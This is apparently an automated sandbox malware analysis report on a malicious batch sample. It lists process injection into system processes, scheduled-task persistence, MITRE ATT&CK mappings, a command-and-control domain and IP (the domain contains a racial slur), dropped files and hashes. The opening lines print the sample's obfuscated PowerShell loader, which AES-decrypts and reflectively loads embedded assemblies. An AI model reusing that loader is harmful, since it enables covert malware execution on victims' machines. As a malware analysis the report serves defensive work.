([*c*o*n*v*e*r*t]::*f*r*o*m*b*a*s*e*6*4*s*tr*i*n*g($brzqf[1].replace("#", "/").replace("@", 
"a"))));'.replace('*', '');invoke-expression '$upd = fpymp (vhvna ([*c*o*n*v*e*r*t]::*f*r*o*m*b*a*s*e*6*4*s*tr*i*n*g($brzqf[2].replace("#", "/").replace("@", "a"))));'.replace('*', '');zhrkt $sti $null;zhrkt $jnt $null;zhrkt $upd (,[string[]] (''));
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function vhvna($zvdeq){ $tqyfy=[system.security.cryptography.aes]::create(); $tqyfy.mode=[system.security.cryptography.ciphermode]::cbc; $tqyfy.padding=[system.security.cryptography.paddingmode]::pkcs7; $tqyfy.key=[system.convert]::frombase64string('axhrlwljv4pwkbof9iaijflo6glezt+6bkch3ruytca='); $tqyfy.iv=[system.convert]::frombase64string('txavkyk6lzidmpmpv8o+4q=='); $bqynp=$tqyfy.createdecryptor(); $fzhat=$bqynp.transformfinalblock($zvdeq, 0, $zvdeq.length); $bqynp.dispose(); $tqyfy.dispose(); $fzhat;}function fpymp($zvdeq){ invoke-expression '$fegds=new-object *s*y*s*t*e*m*.*i*o*.m*em*or*ys*tr*ea*m(,$zvdeq);'.replace('*', ''); invoke-expression '$xpqra=new-object *s*y*s*t*e*m*.*i*o*.*m*e*m*o*r*y*s*t*r*e*a*m*;'.replace('*', ''); invoke-expression '$mcrfz=new-object s*y*s*t*e*m*.*i*o*.c*om*pr*e*ss*io*n.*gz*ip*st*re*am*($fegds, [io.c*om*pr*es*si*on*.co*mp*re*ss*i*o*n*mode]::d*e*c*omp*re*ss);'.replace('*', ''); $mcrfz.copyto($xpqra); $mcrfz.dispose(); $fegds.dispose(); $xpqra.dispose(); $xpqra.toarray();}function zhrkt($zvdeq,$ulmvt){ invoke-expression '$ktvmp=[*s*y*s*t*e*m*.*r*e*fl*ect*io*n.*as*se*mb*l*y*]::l*o*a*d*([byte[]]$zvdeq);'.replace('*', ''); invoke-expression '$apgun=$ktvmp.*e*n*t*r*y*p*o*i*n*t*;'.replace('*', ''); invoke-expression '$apgun.*i*n*v*o*k*e*($null, $ulmvt);'.replace('*', '');}$sqotv = 'c:\windows\$rbx-onimai2\$rbx-co2.bat';$host.ui.rawui.windowtitle = $sqotv;$kfksq=[system.io.file]::readalltext($sqotv).split([environment]::newline);foreach ($vmudf in $kfksq) { if ($vmudf.startswith('iecms')) { $hjzkz=$vmudf.substring(5); break; }}$brzqf=[string[]]$hjzkz.split('\');invoke-expression '$sti = fpymp (vhvna ([*c*o*n*v*e*r*t]::*f*r*o*m*b*a*s*e*6*4*s*tr*i*n*g($brzqf[0].replace("#", "/").replace("@", "a"))));'.replace('*', '');invoke-expression '$jnt = fpymp (vhvna ([*c*o*n*v*e*r*t]::*f*r*o*m*b*a*s*e*6*4*s*tr*i*n*g($brzqf[1].replace("#", "/").replace("@", "a"))));'.replace('*', '');invoke-expression '$upd = fpymp (vhvna ([*c*o*n*v*e*r*t]::*f*r*o*m*b*a*s*e*6*4*s*tr*i*n*g($brzqf[2].replace("#", "/").replace("@", "a"))));'.replace('*', '');zhrkt $sti $null;zhrkt $jnt $null;zhrkt $upd (,[string[]] (''));
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function vhvna($zvdeq){ $tqyfy=[system.security.cryptography.aes]::create(); $tqyfy.mode=[system.security.cryptography.ciphermode]::cbc; $tqyfy.padding=[system.security.cryptography.paddingmode]::pkcs7; $tqyfy.key=[system.convert]::frombase64string('axhrlwljv4pwkbof9iaijflo6glezt+6bkch3ruytca='); $tqyfy.iv=[system.convert]::frombase64string('txavkyk6lzidmpmpv8o+4q=='); $bqynp=$tqyfy.createdecryptor(); $fzhat=$bqynp.transformfinalblock($zvdeq, 0, $zvdeq.length); $bqynp.dispose(); $tqyfy.dispose(); $fzhat;}function fpymp($zvdeq){ invoke-expression '$fegds=new-object *s*y*s*t*e*m*.*i*o*.m*em*or*ys*tr*ea*m(,$zvdeq);'.replace('*', ''); invoke-expression '$xpqra=new-object *s*y*s*t*e*m*.*i*o*.*m*e*m*o*r*y*s*t*r*e*a*m*;'.replace('*', ''); invoke-expression '$mcrfz=new-object s*y*s*t*e*m*.*i*o*.c*om*pr*e*ss*io*n.*gz*ip*st*re*am*($fegds, [io.c*om*pr*es*si*on*.co*mp*re*ss*i*o*n*mode]::d*e*c*omp*re*ss);'.replace('*', ''); $mcrfz.copyto($xpqra); $mcrfz.dispose(); $fegds.dispose(); $xpqra.dispose(); $xpqra.toarray();}function zhrkt($zvdeq,$ulmvt){ invoke-expression '$ktvmp=[*s*y*s*t*e*m*.*r*e*fl*ect*io*n.*as*se*mb*l*y*]::l*o*a*d*([byte[]]$zvdeq);'.replace('*', ''); invoke-expression '$apgun=$ktvmp.*e*n*t*r*y*p*o*i*n*t*;'.replace('*', ''); invoke-expression '$apgun.*i*n*v*o*k*e*($null, $ulmvt);'.replace('*', '');}$sqotv = 'c:\users\user\desktop\product.bat';$host.ui.rawui.windowtitle = $sqotv;$kfksq=[system.io.file]::readalltext($sqotv).split([environment]::newline);foreach ($vmudf in $kfksq) { if ($vmudf.startswith('iecms')) { $hjzkz=$vmudf.substring(5); break; }}$brzqf=[string[]]$hjzkz.split('\');invoke-expression '$sti = fpymp (vhvna ([*c*o*n*v*e*r*t]::*f*r*o*m*b*a*s*e*6*4*s*tr*i*n*g($brzqf[0].replace("#", "/").replace("@", "a"))));'.replace('*', '');invoke-expression '$jnt = fpymp (vhvna ([*c*o*n*v*e*r*t]::*f*r*o*m*b*a*s*e*6*4*s*tr*i*n*g($brzqf[1].replace("#", "/").replace("@", "a"))));'.replace('*', '');invoke-expression '$upd = fpymp (vhvna ([*c*o*n*v*e*r*t]::*f*r*o*m*b*a*s*e*6*4*s*tr*i*n*g($brzqf[2].replace("#", "/").replace("@", "a"))));'.replace('*', '');zhrkt $sti $null;zhrkt $jnt $null;zhrkt $upd (,[string[]] (''));
Source: C:\Windows\System32\dllhost.exe | Code function: 14_2_0000000140002300 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,14_2_0000000140002300
Source: dwm.exe, 00000012.00000000.1420829441.00000262EB2B8000.00000004.00000020.00020000.00000000.sdmp, dwm.exe, 00000012.00000002.3404041850.00000262EB2B8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Managerd
Source: winlogon.exe, 0000000F.00000000.1415619225.000001CA7D6F0000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 0000000F.00000002.3375598042.000001CA7D6F1000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000012.00000000.1422698641.00000262EB6C0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
Source: winlogon.exe, 0000000F.00000000.1415619225.000001CA7D6F0000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 0000000F.00000002.3375598042.000001CA7D6F1000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000012.00000000.1422698641.00000262EB6C0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
Source: winlogon.exe, 0000000F.00000000.1415619225.000001CA7D6F0000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 0000000F.00000002.3375598042.000001CA7D6F1000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000012.00000000.1422698641.00000262EB6C0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: ?Program Manager
Source: winlogon.exe, 0000000F.00000000.1415619225.000001CA7D6F0000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 0000000F.00000002.3375598042.000001CA7D6F1000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000012.00000000.1422698641.00000262EB6C0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
Source: C:\Windows\System32\winlogon.exe | Code function: 15_3_000001CA7D1C2AF0 cpuid 15_3_000001CA7D1C2AF0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\Windows\System32\Tasks\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\Windows\System32\Tasks\$nya-mW41WeM4 VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.SqlXml\v4.0_4.0.0.0__b77a5c561934e089\System.Data.SqlXml.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\System32\winlogon.exe | Code function: 15_2_000001CA7D1E8090 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,15_2_000001CA7D1E8090
Source: dllhost.exe, svchost.exe, 00000024.00000003.1553846007.000002A76AE6F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1554106413.000002A76AE6F000.00000004.00000001.00020000.00000000.sdmp, Microsoft-Windows-Diagnostics-Performance%4Operational.evtx.36.dr | Binary or memory string: MsMpEng.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
MITRE ATT&CK Matrix (techniques matched by signatures; the number in parentheses is the count of matching signatures)

Reconnaissance: none
Resource Development: Scripting (1)
Initial Access: none
Execution: Windows Management Instrumentation (11), Native API (12), Command and Scripting Interpreter (12), Scheduled Task/Job (11), PowerShell (2)
Persistence: Scripting (1), DLL Side-Loading (1), Scheduled Task/Job (11)
Privilege Escalation: DLL Side-Loading (1), Access Token Manipulation (1), Process Injection (613), Scheduled Task/Job (11)
Defense Evasion: Obfuscated Files or Information (1), Timestomp (1), DLL Side-Loading (1), File Deletion (11), Rootkit (4), Masquerading (21), Modify Registry (1), Virtualization/Sandbox Evasion (121), Access Token Manipulation (1), Process Injection (613), Hidden Files and Directories (2)
Credential Access: Credential API Hooking (1), Input Capture (11)
Discovery: System Time Discovery (1), File and Directory Discovery (2), System Information Discovery (122), Security Software Discovery (241), Process Discovery (2), Virtualization/Sandbox Evasion (121), Application Window Discovery (1)
Lateral Movement: none
Collection: Archive Collected Data (1), Credential API Hooking (1), Input Capture (11)
Command and Control: Encrypted Channel (1), Non-Standard Port (1), Non-Application Layer Protocol (1), Application Layer Protocol (1)
Exfiltration: none
Impact: none
Behavior Graph (ID 1574670, sample product.bat, start date 13/12/2024, architecture WINDOWS, score 100)
Sample-level signatures: Malicious sample detected (through community Yara rule); .NET source code references suspicious native API functions; Found large BAT file; 9 other signatures
Contacted domain: iam.nigga.dad

cmd.exe (started) [Suspicious powershell command line found; Suspicious command line found]
  powershell.exe (started) [Uses schtasks.exe or at.exe to add and modify task schedules; Deletes itself after installation; Writes to foreign memory regions; 3 other signatures]
    dllhost.exe (started) [Contains functionality to inject code into remote processes; Writes to foreign memory regions; Creates a thread in another existing process (thread injection); 2 other signatures]
      winlogon.exe (injected)
        dllhost.exe (started) [Injects code into the Windows Explorer (explorer.exe); Writes to foreign memory regions; Creates a thread in another existing process (thread injection); Injects a PE file into a foreign processes]
          svchost.exe (injected)
          svchost.exe (injected)
          svchost.exe (injected)
      lsass.exe (injected)
        svchost.exe (injected)
      dwm.exe (injected)
      17 other processes (injected)
    cmd.exe (started) [Suspicious powershell command line found; Suspicious command line found]
      powershell.exe (started) [Writes to foreign memory regions; Modifies the context of a thread in another process (thread injection); Hides that the sample has been downloaded from the Internet (zone.identifier); 2 other signatures]
        network: iam.nigga.dad 103.230.121.81, ports 49764, 49780, 49794 (VPSQUANUS, Hong Kong)
        dropped: C:\Windows\$nya-onimai2\IhrFKM.exe, PE32+
        schtasks.exe (started)
          conhost.exe (started)
      WMIC.exe (started)
      conhost.exe (started)
      2 other processes
    cmd.exe (started)
      dropped: C:\Windows\$rbx-onimai2\$rbx-CO2.bat, DOS
      conhost.exe (started)
  WMIC.exe (started) [Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)]
  conhost.exe (started)
  2 other processes
Source | Detection | Scanner | Label | Link
product.bat | 0% | ReversingLabs | |

Source | Detection | Scanner | Label | Link
C:\Windows\$nya-onimai2\IhrFKM.exe | 100% | Joe Sandbox ML | |
C:\Windows\$nya-onimai2\IhrFKM.exe | 5% | ReversingLabs | |

No Antivirus matches

No Antivirus matches

Source | Detection | Scanner | Label | Link
http://osoft.co_2010-06X | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
bg.microsoft.map.fastly.net | 199.232.210.172 | true | false | | high
iam.nigga.dad | 103.230.121.81 | true | false | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://schemas.xmlsoap.org/ws/2005/07/securitypolicy | lsass.exe, 00000010.00000002.3349200810.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000010.00000000.1416748782.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000010.00000002.3350244375.0000017D2CE4F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000010.00000000.1416768127.0000017D2CE4F000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702 | lsass.exe, 00000010.00000002.3349200810.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000010.00000000.1416748782.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2004/09/policy | lsass.exe, 00000010.00000002.3349200810.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000010.00000000.1416748782.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/wsdl/erties | lsass.exe, 00000010.00000002.3349200810.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000010.00000000.1416748782.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/wsdl/soap12/ | lsass.exe, 00000010.00000002.3349200810.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000010.00000000.1416748782.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/wsdl/ | lsass.exe, 00000010.00000002.3349200810.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000010.00000000.1416748782.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://aka.ms/pscore6xG | powershell.exe, 00000023.00000002.3376787099.0000021314381000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/wsdl/soap12/P | lsass.exe, 00000010.00000002.3349200810.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000010.00000000.1416748782.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://osoft.co_2010-06X | dwm.exe, 00000012.00000000.1427635100.00000262ED790000.00000004.00000001.00020000.00000000.sdmp, dwm.exe, 00000012.00000002.3415712940.00000262ED790000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.ver) | svchost.exe, 0000001A.00000002.3406712131.000002234AE8A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000000.1477059978.000002234AE8A000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://go.microsoft.c | powershell.exe, 00000023.00000002.3351331204.00000213124B3000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://go.microsoft.ctain | powershell.exe, 00000023.00000002.3351331204.00000213124B3000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://aka.ms/pscore6 | powershell.exe, 00000023.00000002.3376787099.0000021314381000.00000004.00000001.00020000.00000000.sdmp, Null.35.dr, Null.12.dr | false | | high
http://schemas.xmlsoap.org/ws/2005/02/trust | lsass.exe, 00000010.00000002.3349200810.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000010.00000000.1416748782.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://aka.ms/pscore68 | powershell.exe, 00000023.00000002.3376787099.0000021314381000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://docs.oasis-open.org/ws-sx/ws-trust/200512 | lsass.exe, 00000010.00000002.3350244375.0000017D2CE4F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000010.00000000.1416768127.0000017D2CE4F000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd | lsass.exe, 00000010.00000002.3349200810.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000010.00000000.1416748782.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000023.00000002.3376787099.0000021314381000.00000004.00000001.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
103.230.121.81 | iam.nigga.dad | Hong Kong | 62468 | VPSQUANUS | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1574670
Start date and time: 2024-12-13 13:30:12 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 12m 41s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 27
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 24
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: product.bat
Detection: MAL
Classification: mal100.spyw.evad.winBAT@32/74@2/1
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 57
• Number of non-executed functions: 339
Cookbook Comments:
• Found application associated with file extension: .bat
• Exclude process from analysis (whitelisted): dllhost.exe, sppsvc.exe, SIHClient.exe, SgrmBroker.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 199.232.210.172, 40.126.53.13, 40.126.53.8, 20.190.181.6, 40.126.53.16, 20.190.181.5, 40.126.53.15, 20.190.181.23, 40.126.53.17, 20.189.173.20, 13.107.246.63, 20.109.210.53
• Excluded domains from analysis (whitelisted): prdv4a.aadg.msidentity.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, www.tm.v4.a.prd.aadg.akadns.net, onedsblobprdwus15.westus.cloudapp.azure.com, ctldl.windowsupdate.com, time.windows.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, umwatson.events.data.microsoft.com, wu-b-net.trafficmanager.net, www.tm.lg.prod.aadmsa.trafficmanager.net
• Not all processes were analyzed, report is missing behavior information
                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtSetInformationFile calls found.
                                        • VT rate limit hit for: product.bat
Time      Type             Description
07:31:08  API Interceptor  2x Sleep call for process: WMIC.exe modified
07:31:11  API Interceptor  17492x Sleep call for process: powershell.exe modified
08:46:27  API Interceptor  34381x Sleep call for process: svchost.exe modified
08:46:51  API Interceptor  2325151x Sleep call for process: winlogon.exe modified
08:46:52  API Interceptor  79442x Sleep call for process: lsass.exe modified
08:46:59  API Interceptor  2196890x Sleep call for process: dwm.exe modified
08:47:15  API Interceptor  1205x Sleep call for process: cmd.exe modified
08:47:15  API Interceptor  1329x Sleep call for process: conhost.exe modified
08:47:21  API Interceptor  97x Sleep call for process: dllhost.exe modified
Match / Associated Sample Name / URL / Detection / Threat Name / Context

Match: 103.230.121.81 (IP)
• test.exe: malicious, Unknown
• Filezilla-stage2.exe: malicious, Unknown

Match: iam.nigga.dad (domain)
• test.exe: malicious, Unknown; context: 103.230.121.81
• Filezilla-stage2.exe: malicious, Unknown; context: 103.230.121.81

Match: bg.microsoft.map.fastly.net (domain)
• cv.exe: malicious, Unknown; context: 199.232.210.172
• XNizDtIArJ.doc: malicious, Unknown; context: 199.232.210.172
• jCpeLqH5mZ.doc: malicious, Unknown; context: 199.232.210.172
• rcNDmdah2W.doc: malicious, Unknown; context: 199.232.214.172
• HzZkjxWF3j.doc: malicious, Unknown; context: 199.232.210.172
• http://home45insurance.blogspot.com: malicious, Unknown; context: 199.232.214.172
• cGYA93A1qC.doc: malicious, Unknown; context: 199.232.210.172
• Rage.dll: malicious, Unknown; context: 199.232.210.172
• SLNA_Updated_Medical_Grant_Application(1).docx: malicious, Unknown; context: 199.232.210.172
• file.exe: malicious, Credential Flusher; context: 199.232.214.172

Match: VPSQUANUS (ASN)
• test.exe: malicious, Unknown; context: 103.230.121.81
• Filezilla-stage2.exe: malicious, Unknown; context: 103.230.121.81
• rebirth.dbg.elf: malicious, Mirai, Okiru; context: 103.252.20.25
• mips.nn.elf: malicious, Mirai, Okiru; context: 103.122.177.128
• la.bot.arm.elf: malicious, Mirai; context: 154.91.52.33
• file.exe: malicious, XWorm; context: 103.230.121.124
• file.exe: malicious, XWorm; context: 103.230.121.124
• word.exe: malicious, XWorm; context: 103.230.121.124
• svchost.exe: malicious, XWorm; context: 103.230.121.124
• Chrome.exe: malicious, XWorm; context: 103.230.121.124

No context

Match: C:\Windows\$nya-onimai2\IhrFKM.exe (dropped file)
• Hydra.ccLoader.bat: malicious, Unknown
• NhoqAfkhHL.bat: malicious, Unknown
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 7796 bytes, 1 file, at 0x2c +A "pinrules.stl", number 1, 1 datablock, 0x1 compression
                                                Category:dropped
                                                Size (bytes):7796
                                                Entropy (8bit):7.971943145771426
                                                Encrypted:false
                                                SSDEEP:192:CPTIWKvNnUBBBL05O/b0evl2G6AXK+KMlYX82:CbevNUBDLlz0eN2dAXlKH
                                                MD5:FB60E1AFE48764E6BF78719C07813D32
                                                SHA1:A1DC74EF8495C9A1489DD937659B5C2875027E16
                                                SHA-256:EBF3E7290B8FD1E5509CAA69335251F22B61BAF3F9FF87B4E8544F3C1FEA279D
                                                SHA-512:92BAA53445EC1A6EC049AF875783619D255AB4A46241B456BD87AE0043C117740BD117406E2CF5440840C68D0C573CBA7B40F58587CE7796D254D0B06E9B7973
                                                Malicious:false
                                                Preview:MSCF....t.......,...................I........E.........J.R .pinrules.stl..>N.#..ECK.[.T...O......l.$.)V.a...v.d.H...&.D.YA,(+Y...A.......c]."ka-.XW..I.....w..|..9.........{...|d..v.T..w.TMZ.|...).F.rtAm.....f......T.*.......n.z.:.t&.} EH.S.)2...SP.../~.Q..d..".@.5..r(..M.Zs..~{...>...p.p.^....[/p..~.....@......f..E0....9.i...Ds..^.d...N.R@..P%..9... .4Z)...z..h...@.......C<.]6....([.c=.9..l.....@..4......f.......z.!..0.`Jp.."$I..?`......H...].2...$....9v1./g.&.aIX.A..A.w*..p.*.`r.........'!e.. ..d...H.d.hu`.\!w.Z..E.$....$..|1..@.OC!c.......%.....p.uxC.~@....`...#.~ .P.!.Gb`)i...L..0.-.K.....xRx.e"..@.....5T..JP^.9.....#aH.E.@2..H..f.H..K...+x..$.WM..H}....=....`.PD:.qgn........I.....]uX..q...D...]n.4..0..b!.....m"a.Lz...d..S%P.I11,..^..".+At..To\@K.....c.h.C.....=...H.Xa...r.A.I..@!..0..eV...|.h..$."r..hL9TR..}.v%...4).H..[.....r..|]..+5..Y..I..hN...O=u..8.}U...#S...R..KQ..A..w....X|.....8b...GC.4..h....6gG.>..}.8....!ql..A..1..X.C.q.j....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:modified
                                                Size (bytes):330
                                                Entropy (8bit):3.3022001159184358
                                                Encrypted:false
                                                SSDEEP:6:kK0sK81wNSWsCN+SkQlPlEGYRMY9z+4D1QuflIeyGIla1:8sK0FkPlE99Si1QyIeek
                                                MD5:FC28F580A9552D0645E7E76E1259FD25
                                                SHA1:F42EF0CE7EF040B9EF5EF599681DB9B30423B8B2
                                                SHA-256:EEE93C4EAF1B3FCB1C8AF3FA9E74C24150F41EAA0A7E11DC4ADD2DFE138604E5
                                                SHA-512:8444D2E7D8DC2BEF809769F439D9C04475D31F946BBAB174A61B9F5DC88100D1B7763FE7A09DDE7466FBFF7FF9DBC91B6A28CE197B5477A89C24DAAD415E7F75
                                                Malicious:false
